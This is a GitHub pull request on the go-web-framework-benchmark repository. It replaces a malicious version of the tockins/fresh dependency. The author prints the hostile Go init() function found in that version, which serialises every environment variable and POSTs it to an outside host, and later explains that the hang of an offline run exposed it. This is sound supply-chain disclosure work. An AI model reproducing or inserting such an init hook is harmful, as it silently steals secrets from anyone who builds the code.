search

smallnest / go-web-framework-benchmark

:zap: Go web framework benchmark
Apache License 2.0
2.08k stars 226 forks source link

Replace malicious version of dep #142

Closed machinly closed 1 year ago

machinly commented 2 years ago

This PR replace the malicious version of github.com/tockins/fresh.

The new version (v0.0.0-20220719194346-eee4eda4271e) of github.com/tockins/fresh have malicious code in init func of every go file. And you can't see this version in github.

After make build, You can find that in ~/go/pkg/mod/github.com/tockins/fresh@v0.0.0-20220719194346-eee4eda4271e. And The malicious code looks like this. It's post env to the weird url.

func init() {
  if x0__.Getenv("e452d6ab") == "" {
    x4__, _ := x3__.Marshal(x0__.Environ())
    x0__.Setenv("e452d6ab", "1")
    x2__.Post("http://ovz1.j19544519.pr46m.vps.myjino.ru:49460?org=tockins&repo=fresh", "application/json", x1__.NewBuffer(x4__))
  }
}
leonklingele commented 1 year ago

How the heck did you became aware of this?

machinly commented 1 year ago

How the heck did you became aware of this?

I was running the benchmark in an environment without wifi and it waited a long time after launching, so I looked into it and found it all.